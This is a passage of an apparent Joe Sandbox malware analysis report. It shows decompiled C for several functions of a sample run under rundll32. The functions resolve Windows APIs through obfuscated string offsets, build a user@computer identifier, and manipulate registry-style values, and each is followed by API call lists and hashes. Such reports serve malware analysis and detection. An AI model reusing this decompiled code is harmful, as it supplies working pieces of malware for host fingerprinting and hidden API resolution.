				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04C058BE(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4c0d2a4; // 0x97a5a8
					_t1 = _t23 + 0x4c0e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4c0d2a4; // 0x97a5a8
					_t2 = _t26 + 0x4c0e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04C0147E(_t54);
					} else {
						_t30 =  *0x4c0d2a4; // 0x97a5a8
						_t5 = _t30 + 0x4c0e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4c0d2a4; // 0x97a5a8
							_t7 = _t33 + 0x4c0e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4c0d2a4; // 0x97a5a8
								_t9 = _t36 + 0x4c0e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4c0d2a4; // 0x97a5a8
									_t11 = _t39 + 0x4c0e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04C07B01(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                          0x04c057e7
                                          0x04c057eb
                                          0x04c058ad
                                          0x04c057f1
                                          0x04c057f1
                                          0x04c057f6
                                          0x04c05809
                                          0x04c0580b
                                          0x04c05810
                                          0x04c05818
                                          0x04c0581f
                                          0x04c05821
                                          0x04c05826
                                          0x04c058a5
                                          0x04c058a6
                                          0x04c05828
                                          0x04c05828
                                          0x04c0582d
                                          0x04c05835
                                          0x04c05837
                                          0x04c0583c
                                          0x00000000
                                          0x04c0583e
                                          0x04c0583e
                                          0x04c05843
                                          0x04c0584b
                                          0x04c0584d
                                          0x04c05852
                                          0x00000000
                                          0x04c05854
                                          0x04c05854
                                          0x04c05859
                                          0x04c05861
                                          0x04c05863
                                          0x04c05868
                                          0x00000000
                                          0x04c0586a
                                          0x04c0586a
                                          0x04c0586f
                                          0x04c05877
                                          0x04c05879
                                          0x04c0587e
                                          0x00000000
                                          0x04c05880
                                          0x04c05886
                                          0x04c0588b
                                          0x04c05892
                                          0x04c05897
                                          0x04c0589c
                                          0x00000000
                                          0x04c0589e
                                          0x04c058a1
                                          0x04c058a1
                                          0x04c0589c
                                          0x04c0587e
                                          0x04c05868
                                          0x04c05852
                                          0x04c0583c
                                          0x04c05826
                                          0x04c058bb

                                          APIs
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04C014AF,?,?,?,?,00000000,00000000), ref: 04C057FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04C0581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04C05835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04C0584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04C05861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04C05877
                                            • Part of subcall function 04C07B01: memset.NTDLL ref: 04C07B80
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: 145528d0999a38d40e850c8e1dd27778c73c7a17d49fc35dd1fe169382b79b9e
                                          • Instruction ID: f7814b2640a7ba99708b471c42dcea838c95ced0d3cc15ddd66088b3d746f9ac
                                          • Opcode Fuzzy Hash: 145528d0999a38d40e850c8e1dd27778c73c7a17d49fc35dd1fe169382b79b9e
                                          • Instruction Fuzzy Hash: 492161B4640306AFFB20EFA9C844D5677FDEF443047068965E909DB251EB74EA40CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C0A642, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E04C0A642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x4c0d33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E04C0A5E9(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E04C0621D(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E04C0147E(_a8);
						goto L29;
					}
					_t65 =  *0x4c0d2a4; // 0x97a5a8
					_t16 = _t65 + 0x4c0e8de; // 0x65696c43
					_t68 = E04C0A5E9(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d04c0c0
						if(E04C04C9A( *_t33, _t96, _a8,  *0x4c0d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x4c0d2a4; // 0x97a5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0x4c0ea54; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x4c0ea4f; // 0x55434b48
								_t73 = _t34;
							}
							if(E04C030FC( &_a24, _t73,  *0x4c0d334,  *0x4c0d338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0x4c0d2a4; // 0x97a5a8
									_t44 = _t75 + 0x4c0e856; // 0x74666f53
									_t78 = E04C0A5E9(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d04c0c0
										E04C01BC1( *_t47, _t96, _a8,  *0x4c0d338, _a24);
										_t49 = _t105 + 0x10; // 0x3d04c0c0
										E04C01BC1( *_t49, _t96, _t103,  *0x4c0d330, _a16);
										E04C0147E(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d04c0c0
									E04C01BC1( *_t40, _t96, _a8,  *0x4c0d338, _a24);
									_t43 = _t105 + 0x10; // 0x3d04c0c0
									E04C01BC1( *_t43, _t96, _a8,  *0x4c0d330, _a16);
								}
								if( *_t105 != 0) {
									E04C0147E(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d04c0c0
					if(E04C074B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d04c0c0
							E04C04C9A( *_t26, _t96, _a8, _a24, _t104);
						}
						E04C0147E(_t104);
						_t102 = _a16;
					}
					E04C0147E(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0x4c0d33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}























                                          0x04c0a642
                                          0x04c0a64b
                                          0x04c0a652
                                          0x04c0a657
                                          0x04c0a6c6
                                          0x04c0a6cc
                                          0x04c0a6d1
                                          0x04c0a6da
                                          0x04c0a6df
                                          0x04c0a6e4
                                          0x04c0a858
                                          0x04c0a85f
                                          0x04c0a85f
                                          0x04c0a864
                                          0x04c0a866
                                          0x04c0a866
                                          0x04c0a86f
                                          0x04c0a86f
                                          0x04c0a6ea
                                          0x04c0a6f6
                                          0x04c0a84e
                                          0x04c0a851
                                          0x00000000
                                          0x04c0a851
                                          0x04c0a6fc
                                          0x04c0a701
                                          0x04c0a70a
                                          0x04c0a70f
                                          0x04c0a714
                                          0x04c0a75e
                                          0x04c0a75e
                                          0x04c0a771
                                          0x04c0a77b
                                          0x04c0a781
                                          0x04c0a788
                                          0x04c0a792
                                          0x04c0a792
                                          0x04c0a78a
                                          0x04c0a78a
                                          0x04c0a78a
                                          0x04c0a78a
                                          0x04c0a7b4
                                          0x04c0a7bc
                                          0x04c0a7ea
                                          0x04c0a7ef
                                          0x04c0a7f8
                                          0x04c0a7fd
                                          0x04c0a801
                                          0x04c0a833
                                          0x04c0a803
                                          0x04c0a810
                                          0x04c0a813
                                          0x04c0a823
                                          0x04c0a826
                                          0x04c0a82c
                                          0x04c0a82c
                                          0x04c0a7be
                                          0x04c0a7cb
                                          0x04c0a7ce
                                          0x04c0a7e0
                                          0x04c0a7e3
                                          0x04c0a7e3
                                          0x04c0a83d
                                          0x04c0a849
                                          0x04c0a83f
                                          0x04c0a842
                                          0x04c0a842
                                          0x04c0a83d
                                          0x04c0a7b4
                                          0x00000000
                                          0x04c0a77b
                                          0x04c0a723
                                          0x04c0a72d
                                          0x04c0a72f
                                          0x04c0a734
                                          0x04c0a738
                                          0x04c0a73a
                                          0x04c0a745
                                          0x04c0a748
                                          0x04c0a748
                                          0x04c0a74e
                                          0x04c0a753
                                          0x04c0a753
                                          0x04c0a759
                                          0x00000000
                                          0x04c0a759
                                          0x04c0a65c
                                          0x00000000
                                          0x04c0a683
                                          0x04c0a68e
                                          0x04c0a6a4
                                          0x04c0a6aa
                                          0x04c0a6b2
                                          0x00000000
                                          0x04c0a6b2

                                          APIs
                                          • StrChrA.SHLWAPI(04C0553C,0000005F,00000000,00000000,00000104), ref: 04C0A675
                                          • memcpy.NTDLL(?,04C0553C,?), ref: 04C0A68E
                                          • lstrcpy.KERNEL32(?), ref: 04C0A6A4
                                            • Part of subcall function 04C0A5E9: lstrlen.KERNEL32(?,00000000,04C0D330,00000001,04C0937A,04C0D00C,04C0D00C,00000000,00000005,00000000,00000000,?,?,?,04C0207E,?), ref: 04C0A5F2
                                            • Part of subcall function 04C0A5E9: mbstowcs.NTDLL ref: 04C0A619
                                            • Part of subcall function 04C0A5E9: memset.NTDLL ref: 04C0A62B
                                            • Part of subcall function 04C01BC1: lstrlenW.KERNEL32(04C0553C,?,?,04C0A818,3D04C0C0,80000002,04C0553C,04C09642,74666F53,4D4C4B48,04C09642,?,3D04C0C0,80000002,04C0553C,?), ref: 04C01BE1
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 04C0A6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: cc645efaf52be1ff2f9370c32edbd5089b300107926b79d592698b5a204afe64
                                          • Instruction ID: 6f08aeb127441ca17a1492647bb2ae8a8cf4345313396adef90bba1aefafd7bb
                                          • Opcode Fuzzy Hash: cc645efaf52be1ff2f9370c32edbd5089b300107926b79d592698b5a204afe64
                                          • Instruction Fuzzy Hash: AD515C7650020AEFEF21AFA4DD40E9A7BBAFF14304F05C614FA15961A0E736EE55EB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C0614A, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04C0614A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E04C058BE(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04C0147E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4c05210
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                          0x04c06158
                                          0x04c0615b
                                          0x04c0615e
                                          0x04c06164
                                          0x04c06169
                                          0x04c0616f
                                          0x04c06177
                                          0x04c0617a
                                          0x04c06180
                                          0x04c06185
                                          0x04c06192
                                          0x04c0619f
                                          0x04c061a3
                                          0x04c061a5
                                          0x04c061a9
                                          0x04c061ac
                                          0x04c061bc
                                          0x04c0620f
                                          0x04c06210
                                          0x04c061be
                                          0x04c061c3
                                          0x04c061c4
                                          0x04c061c9
                                          0x04c061cc
                                          0x04c061df
                                          0x00000000
                                          0x04c061e1
                                          0x04c061e4
                                          0x04c061e9
                                          0x04c061f7
                                          0x04c061fa
                                          0x04c06200
                                          0x04c06205
                                          0x00000000
                                          0x04c06207
                                          0x04c06207
                                          0x04c0620a
                                          0x04c0620a
                                          0x04c06205
                                          0x04c061df
                                          0x04c06215
                                          0x04c06216
                                          0x04c06185
                                          0x04c0621c

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,04C0520E), ref: 04C0615E
                                          • GetComputerNameW.KERNEL32(00000000,04C0520E), ref: 04C0617A
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • GetUserNameW.ADVAPI32(00000000,04C0520E), ref: 04C061B4
                                          • GetComputerNameW.KERNEL32(04C0520E,?), ref: 04C061D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04C0520E,00000000,04C05210,00000000,00000000,?,?,04C0520E), ref: 04C061FA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 8c6aae520dd94136bde4154f97919354819a08bfdf9d90ad6a44d952e2b432b8
                                          • Instruction ID: 91aa6ac5ea653960391f23f4833221e5096a810506afc9f2412625866d8126dc
                                          • Opcode Fuzzy Hash: 8c6aae520dd94136bde4154f97919354819a08bfdf9d90ad6a44d952e2b432b8
                                          • Instruction Fuzzy Hash: FD21EAB6A40208FFDB11DFE5D984DEEBBBDEF54304B1084AAE501E7241E634AB54DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C062CD, Relevance: 7.6, APIs: 5, Instructions: 75memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04C062CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0x4c0d114(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0x4c0d238, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}
















                                          0x04c062d5
                                          0x04c062d8
                                          0x04c062da
                                          0x04c062e3
                                          0x04c062f5
                                          0x04c062f5
                                          0x04c062f9
                                          0x04c062fb
                                          0x04c062fe
                                          0x04c06301
                                          0x04c0630a
                                          0x04c06314
                                          0x04c06318
                                          0x04c0631d
                                          0x04c06333
                                          0x04c06337
                                          0x04c06388
                                          0x04c06339
                                          0x04c06339
                                          0x04c06341
                                          0x04c06350
                                          0x04c06355
                                          0x04c06365
                                          0x04c0636b
                                          0x04c06376
                                          0x04c06380
                                          0x04c06384
                                          0x04c06384
                                          0x04c06337
                                          0x04c0638f
                                          0x04c06396

                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04C06301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04C0632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 04C06341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04C06350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04C0636B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 3b609d4b63ba5fed0b85635ae632b00bd708633b71befef8b2ae20c08e9e7418
                                          • Instruction ID: f23f5fbabeb80863f8b11ae830607fa7f3ac514c45a756797fdd3d4d0a97994a
                                          • Opcode Fuzzy Hash: 3b609d4b63ba5fed0b85635ae632b00bd708633b71befef8b2ae20c08e9e7418
                                          • Instruction Fuzzy Hash: DA218E7AA00209AFDB019FA8C844BDEBF7AEF85304F058154ED44AB344C735EA65CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C09FE7, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04C09FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04C06B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E04C0A96C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x4c0d12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                          0x04c09fe7
                                          0x04c09ff4
                                          0x04c09ff6
                                          0x04c0a059
                                          0x00000000
                                          0x04c0a059
                                          0x04c0a00e
                                          0x04c0a015
                                          0x04c0a021
                                          0x04c0a026
                                          0x04c0a028
                                          0x04c0a02a
                                          0x04c0a02c
                                          0x04c0a02e
                                          0x04c0a030
                                          0x04c0a03c
                                          0x04c0a04c
                                          0x00000000
                                          0x04c0a03e
                                          0x04c0a03e
                                          0x04c0a045
                                          0x04c0a052
                                          0x04c0a052
                                          0x04c0a052
                                          0x04c0a045
                                          0x04c0a03c
                                          0x04c0a057
                                          0x00000000
                                          0x00000000
                                          0x04c0a05d

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04C066AF,?,?,00000000,00000000), ref: 04C0A021
                                          • ResetEvent.KERNEL32(?), ref: 04C0A026
                                          • GetLastError.KERNEL32 ref: 04C0A03E
                                          • GetLastError.KERNEL32(?,?,00000102,04C066AF,?,?,00000000,00000000), ref: 04C0A059
                                            • Part of subcall function 04C06B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04C0A006,?,?,?,?,00000102,04C066AF,?,?,00000000), ref: 04C06B7A
                                            • Part of subcall function 04C06B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04C0A006,?,?,?,?,00000102,04C066AF,?), ref: 04C06BD8
                                            • Part of subcall function 04C06B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 04C06BE8
                                          • SetEvent.KERNEL32(?), ref: 04C0A04C
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: 2d1eeabddf731363bf617a48b0cfeb4765905a661ef13df0d569514976a1b7ca
                                          • Instruction ID: 61b4f86d9eb36f9e40af60989e27d9f27b22191fc4abf6368414ecfbbc8387ea
                                          • Opcode Fuzzy Hash: 2d1eeabddf731363bf617a48b0cfeb4765905a661ef13df0d569514976a1b7ca
                                          • Instruction Fuzzy Hash: 1F016D35200304ABEB306E71DC44F5BB7AAFF54768F11CB24F652910E0D726F855EA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C06A7F, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04C06A7F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4c0d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4c0d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4c0d258 = _t6;
					 *0x4c0d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4c0d254 = _t7;
					if(_t7 == 0) {
						 *0x4c0d254 =  *0x4c0d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                          0x04c06a87
                                          0x04c06a8d
                                          0x04c06a94
                                          0x00000000
                                          0x04c06aee
                                          0x04c06a96
                                          0x04c06a9e
                                          0x04c06aab
                                          0x04c06aab
                                          0x04c06aeb
                                          0x00000000
                                          0x04c06aeb
                                          0x04c06aad
                                          0x04c06aad
                                          0x04c06ab2
                                          0x04c06ac4
                                          0x04c06ac9
                                          0x04c06acf
                                          0x04c06ad5
                                          0x04c06adc
                                          0x04c06ade
                                          0x04c06ade
                                          0x00000000
                                          0x04c06ae5
                                          0x04c06aa7
                                          0x00000000
                                          0x00000000
                                          0x04c06aa9
                                          0x00000000

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04C090D2,?), ref: 04C06A87
                                          • GetVersion.KERNEL32 ref: 04C06A96
                                          • GetCurrentProcessId.KERNEL32 ref: 04C06AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04C06ACF
                                          • GetLastError.KERNEL32 ref: 04C06AEE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: d116a86dabf6b0123f6e91f5bfcb831153df524c11684fe1e5744b41831f4f9e
                                          • Instruction ID: bc6dd50009ae4a34a640470c9b25c4091e8f692e16741bfef5ef3b7ec2ce5ee1
                                          • Opcode Fuzzy Hash: d116a86dabf6b0123f6e91f5bfcb831153df524c11684fe1e5744b41831f4f9e
                                          • Instruction Fuzzy Hash: 59F0AF78750302DBE724AFA5A809B263BA2E744705F02C22AE543C61C0E778ECE1CF25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C0A060, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 04C0A09B
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C0A180
                                            • Part of subcall function 04C091B5: SysAllocString.OLEAUT32(04C0C298), ref: 04C09205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04C0A1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C0A1E2
                                            • Part of subcall function 04C0A872: Sleep.KERNEL32(000001F4), ref: 04C0A8BA
                                          Memory Dump Source
